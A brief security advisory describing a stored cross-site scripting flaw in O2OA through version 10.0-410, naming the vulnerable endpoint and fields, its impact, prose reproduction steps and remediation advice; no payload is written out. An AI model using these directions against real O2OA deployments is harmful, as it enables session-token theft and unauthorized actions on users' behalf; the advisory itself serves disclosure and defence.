O2OA Stored Cross-Site Scripting Vulnerability in Personal Profile Page Component

A stored cross-site scripting vulnerability has been identified in O2OA versions through 10.0-410. The issue resides in the Personal Profile Page component, specifically within the '/x_query_assemble_designer/jaxrs/table' endpoint. The vulnerability is caused by user input in the 'description', 'applicationName', and 'queryName' fields being stored without proper sanitization. This unsanitized input is later rendered in the application, allowing for the execution of malicious scripts. The vulnerability can be exploited remotely, and a public proof-of-concept exploit is available.

Impact

Exploitation of this vulnerability allows for the persistent execution of JavaScript in the context of the victim's browser. This could lead to the theft of session tokens or sensitive user information, as well as the performance of unauthorized actions on behalf of authenticated users.

Reproduction

To reproduce this vulnerability, send a POST request to the '/x_query_assemble_designer/jaxrs/table' endpoint with an unsanitized payload in the 'description', 'applicationName', and 'queryName' fields. Include the necessary headers and authorization token. Once the payload is stored, it will be executed when the profile is viewed, confirming the presence of the cross-site scripting vulnerability.

Remediation

The vendor has acknowledged this issue and stated that it will be fixed in a future version. In the meantime, it is recommended to filter and escape user input in profile fields before storing it, and to ensure proper output encoding when displaying data.